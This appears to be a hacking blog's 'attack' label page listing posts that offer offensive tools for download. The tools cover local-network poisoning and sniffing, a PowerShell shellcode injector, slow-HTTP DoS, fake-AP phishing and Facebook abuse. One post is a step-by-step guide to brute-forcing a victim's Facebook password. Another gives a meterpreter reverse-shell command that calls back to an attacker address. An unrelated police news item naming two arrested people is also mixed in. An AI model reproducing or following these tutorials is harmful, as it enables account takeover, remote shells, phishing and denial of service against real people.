Showing posts with label attack. Show all posts
Showing posts with label attack. Show all posts
Wednesday, April 26, 2017
Zarp Local Network Attack Framework
Zarp Local Network Attack Framework

Zarp is a network attack tool centered around the exploitation of local networks. This does not include system exploitation, but rather abusing networking protocols and stacks to take over, infiltrate, and knock out. Sessions can be managed to quickly poison and sniff multiple systems at once, dumping sensitive information automatically or to the attacker directly. Various sniffers are included to automatically parse usernames and passwords from various protocols, as well as view HTTP traffic and more. DoS attacks are included to knock out various systems and applications. These tools open up the possibility for very complex attack scenarios on live networks quickly, cleanly, and quietly.
The long-term goal of zarp is to become the master command center of a network; to provide a modular, well-defined framework that provides a powerful overview and in-depth analysis of an entire network. This will come to light with the future inclusion of a web application front-end, which acts as the television screen, whereas the CLI interface will be the remote. This will provide network topology reports, host relationships, and more. zarp aims to be your window into the potential exploitability of a network and its hosts, not an exploitation platform itself; it is the manipulation of relationships and trust felt within local intranets. Look for zeb, the web-app frontend to zarp, sometime in the future.
Tool Overview
Broad categories are (see wiki for more information on these):
- Poisoners
- Denial of Service
- Sniffers
- Scanners
- Services
- Parameter
- Attacks
List of modules accessible from the command line:
bryan@debdev:~/tools/zarp$ sudo ./zarp.py --help
[!] Loaded 34 modules.
____ __ ____ ____
(__ ) / _ ( _ ( _
/ _/ / ) / ) __/
(____)_/_/(___)(__) [Version: 0.1.5]
usage: zarp.py [-h] [-q FILTER] [--update] [--wap] [--ftp] [--http] [--smb]
[--ssh] [--telnet] [-w] [-s] [--service-scan]
optional arguments:
-h, --help show this help message and exit
-q FILTER Generic network sniff
--update Update Zarp
Services:
--wap Wireless access point
--ftp FTP server
--http HTTP Server
--smb SMB Service
--ssh SSH Server
--telnet Telnet server
Scanners:
-w Wireless AP Scan
-s Network scanner
--service-scan Service scanner
bryan@debdev:~/tools/zarp$ Download Zarp
Go to link download
Sunday, April 16, 2017
HOW TO HACK FACEBOOK ACCOUNT PASSWORD USING BRUTE FORCE ATTACK
HOW TO HACK FACEBOOK ACCOUNT PASSWORD USING BRUTE FORCE ATTACK
Facebook Account hacking is not easy, but Tricks world provides you new and latest tricks to hack facebook accounts from android or from PC. i think you all read my previous articles on facebook hacking and according to team tekgyd they all are still working.

This (Facebook Hacking) is Only for Educational Purpose, Strictly Prohibited to use in wrong way
What Is Brute Force Attack?
Brute Force Attack is also known as Brute force cracking .It a a common trail & error method used by application programs to decode encrypted data such as Passwords, databases or other loop holes securities. This is a general definition of Brute force by google or other bloggers.
So, First lets know something about Brute force attacks, A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN).
In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.
But, In our case Ill be using a Python script and a Long Dictionary Of passwords. I have personally tried it on myself and it really works .
Also Read: Facebook phishing with undetectable profile
Requirement:
1. A Kali Machine / Or Any Python Engine Will work!
2. Facebook.py Download
3. A FaceBook id Of course
4. CrackStation Word List! Download from here
Now, Lets Start The Work
step 1. Install Python-mechanize using command mention below
[*] root@root:~#apt-get install python-mechanize
step 2. Add facebook.py using the command below
[*] root@root~# chmod +x facebook.py [*] root@root:~# python facebook.py
step 3. Now enter | Email | or | Phone number | or | Profile ID number| or | Username | of the victim,
step 4 . Now Give The "Path" Of Your CrackStation Word list
step 5. Now it will try all passwords present in the word list, So relax and have a cup of
coffee because it will take time depending on speed of your processor and password strength of your victim!
Go to link download
Unicorn Tool for using a PowerShell downgrade attack and inject shellcode straight into memory
Unicorn Tool for using a PowerShell downgrade attack and inject shellcode straight into memory
Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graebers powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Usage is simple, just run Magic Unicorn (ensure Metasploit is installed and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system.
root@bt:~/Desktop# python unicorn.py
,/
//
,//
___ /| |//
`__/_ --(/|___/-/
|_-___ __-_`- /-/ .
|_-___,-_____--/_) )
-_ / __ ( `( __`|
`__| |) ) /(/|
,._____., ,--//-| | /
/ __. , / /,---| /
/ / _. `/`_/ _, | |
| | ( ( | ,/__// | |
| `--, `_/_------______/ ( )/
| | _. , ___/
| | _
_ /
._ __ _| |
___ |
__ __ _ | |
| _____ ____ | |
| __ --- .__ | | |
__ --- / ) | /
____/ / ()( `---_ /|
__________/(,--__ _________. | ./ |
| `---_--, _,./ |
| _ ` /`---_______- /
.___,`| /
| _ | ( |: |
| / / | ;
( `_ |
. . `__/ | |
. | |
( )
| | | |
| I `
( __; ( _; (-_;
|___ ___: ___:Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.
Usage:
python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443Download Unicorn
Go to link download
Friday, April 14, 2017
SlowHTTPTest Application Layer DoS attack simulator
SlowHTTPTest Application Layer DoS attack simulator

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on majority of Linux platforms, OSX and Cygwin - a Unix-like environment and command-line interface for Microsoft Windows.
It implements most common low-bandwidth Application Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack (based on TCP persist timer exploit) by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant memory and CPU usage on the server.
Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires requests to be completely received by the server before they are processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If the server keeps too many resources busy, this creates a denial of service. This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Download SlowHTTPTest
Go to link download
Labels:
application,
attack,
dos,
layer,
simulator,
slowhttptest
Friday, March 31, 2017
PwnStar Script for multi attack for all your fake AP needs!
PwnStar Script for multi attack for all your fake AP needs!

A bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. Can act as multi-client captive portal using php and iptables. Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3.
Usage
Basic Menu
1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc
no internet access given
2) Grab WPA handshake
3) Sniffing: provide internet access, then be MITM
4) Simple web server with dnsspoof: redirect the victim to your webpage
5) Karmetasploit
6) Browser_autopwn
1) Relies on auto-connections ie the device connnects without the owner being aware. You can then attempt to exploit it. Target the fake-AP ESSID to something the device has likely connected to previously eg Starbucks WiFi
2) Sometimes it is quicker to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target. Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap.
3) Provides an open network, so you can sniff the victims activities.
4) Uses apache to serve a webpage. There is an option to load your own page eg one you have cloned. The provided page (hotspot_3) asks for email details. Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof. DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a much better way of hosting hotspot_3
5&6) Provides all the config files to properly set-up Karmetasploit and Browser_autopwn.
Advanced Menu
a) Captive portals (phish/sniff)
b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)
c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)
d) Java_jre17_jmxbean
e) Choose another browser exploit
a) Uses iptables rules to route the clients. This is a fully functioning captive portal, and can track and block/allow multiple connections simultaneously. Avoids the problems of dns-spoofing. There are two built-in web options:
1) Serves hotspot3. Does not allow clients onto the internet until credentials have been given.
2) Allows you to add a personal header to the index.php. You could probably copy the php functions from this page onto a cloned page, and load that instead.
b) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet. Includes a virgin pdf to which you can add your own payload.
c&d) Launches a couple of example browser exploits
e) Gives a skeleton framework for loading any browser exploit of your choice. Edit PwnSTAR browser_exploit_fn directly for more control.
Download PwnStar
Go to link download
Saturday, March 25, 2017
Osueta A simple Python script to exploit the OpenSSH User Enumeration Timing Attack
Osueta A simple Python script to exploit the OpenSSH User Enumeration Timing Attack
Osueta its a simple Python2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions 5.* and 6.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DOS condition in the OpenSSH server.
usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
[-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
[-c VERS] [--dos DOS] [-t THREADS]
OpenSSH User Enumeration Time-Based Attack Python script
optional arguments:
-h, --help show this help message and exit
-H HOST Host Ip or CIDR netblock.
-k HFILE Host list in a file.
-f FQDN FQDN to attack.
-p PORT Host port.
-L UFILE Username list file.
-U USER Only use a single username.
-d DELAY Time delay fixed in seconds. If not, delay time is calculated.
-v VARI Make variations of the username (default yes).
-o OUTP Output file with positive results.
-l LENGTH Length of the password in characters (x1000) (default 40).
-c VERS Check or not the OpenSSH version (default yes).
--dos DOS Try to make a DOS attack (default no).
-t THREADS Threads for the DOS attack (default 5).Download Osueta
Go to link download
Tuesday, March 14, 2017
Father daughter duo attack off duty Transit Police officer
Father daughter duo attack off duty Transit Police officer
?
![]() |
| Madison Muse |
![]() |
| David Muse |
On March 3, 2017 at approximately 11:45PM an off duty Transit Police officer was travelling on an outbound Orange Line train. When the train stopped at Community College the off duty officers attention was drawn to an unknown disturbance on another car and he also overheard an MBTA transportation official state " Get off the train, get off the train", to those responsible for the disturbance. The pair who instigated the disturbance a father and his daughter, later identified as David Muse, 48, and Madison Muse, 22, both of Saugus exited the train and begin to walk on the platform. As they did so Madison Muse was yelling racial slurs and expletives. At this time the off duty officer began to video record Madison Muses behavior and offensive racially charged language. Upon noticing this Madison Muse violently attacked the officer and was joined by David Muse. The attack continued onto the platform and eventually was broken up. Madison Muse hurled multiple racial slurs at the off duty officer. At this time the officer, whose phone was dislodged during the attack, attempted to use a call box to contact Transit Police Operations was physically prevented from doing by both Muse as they punched and kicked the off duty officer several times.
Ultimately an MBTA employee was able to contact TPD who responded and placed Muses into custody for Assault & Battery w/a Dangerous Weapon, Assault & Battery and Intimidation of a Witness and transported to Transit Police HQ for the arrest booking process. The officers noted the Muse exhibited signs of intoxication. during The booking process it was discovered David Muse had an outstanding warrant in existence for his arrest issued from Somerville District Court for OUI-Liquor 2nd Offence and Operating with a Suspended License.
Transit Police Superintendent Richard Sullivan praised the off duty officer for his tremendous restraint and professionalism, " This is yet another example Transit Police officers, whether on or off duty, are dedicated to having the safest system as possible. Our officer showed tremendous restraint in the face of such ignorance. We are very grateful he was not seriously injured and we will follow this case throughout the judicial process to ensure the Muses are held responsible for their criminal actions ".
media inquiries should be directed to Superintendent Richard Sullivan at rsullivan@mbta.com
the events listed above are allegations; All defendants are presumed innocent until and unless proven guilty beyond a reasonable doubt
tpdnews
media inquiries should be directed to Superintendent Richard Sullivan at rsullivan@mbta.com
tpdnews
Go to link download
Friday, March 10, 2017
FBHT v3 0 Facebook Hacking Tool Like flood Note DDoS attack FBFriendlyLogout more
FBHT v3 0 Facebook Hacking Tool Like flood Note DDoS attack FBFriendlyLogout more

FBHT (Facebook Hacking Tool) is an open-source tool written in Python that exploits multiple vulnerabilities on the Facebook platform
The tool provides:
- 1) Create accounts
- 2) Delete all accounts for a given user
- 3) Send friendship requests (Test Accounts)
- 4) Accept friendship requests (Test Accounts)
- 5) Connect all the accounts of the database
- 6) Link Preview hack (Simple web version)
- 7) Link Preview hack (Youtube version)
- 8) Youtube hijack
- 9) Private message, Link Preview hack (Simple web version)
- 10) Private message, Link Preview hack (Youtube version)
- 11) NEW Like flood
- 12) Publish a post as an App (App Message Spoof)
- 13) Bypass friendship privacy
- 14) Bypass friendship privacy with graph support
- 15) Analyze an existing graph
- 16) Link to disclosed friendships
- 17) Print database status
- 18) Increase logging level globally
- 19) Set global login (Credentials stored in memory - Danger)
- 20) Print dead attacks :(
- 21) Send friend request to disclosed friend list from your account
- 22) Bypass friendship (only .dot without graph integration)
- 23) Note DDoS attack
- 24) Old Like Flood (Not working)
- 25) NEW! SPAM any fanpage inbox
- 26) Bypass - database support (Beta)
- 27) Logout all your friends - FB blackout
- 28) Close the application
Download FBHT v3.0
Go to link download
Subscribe to:
Posts (Atom)

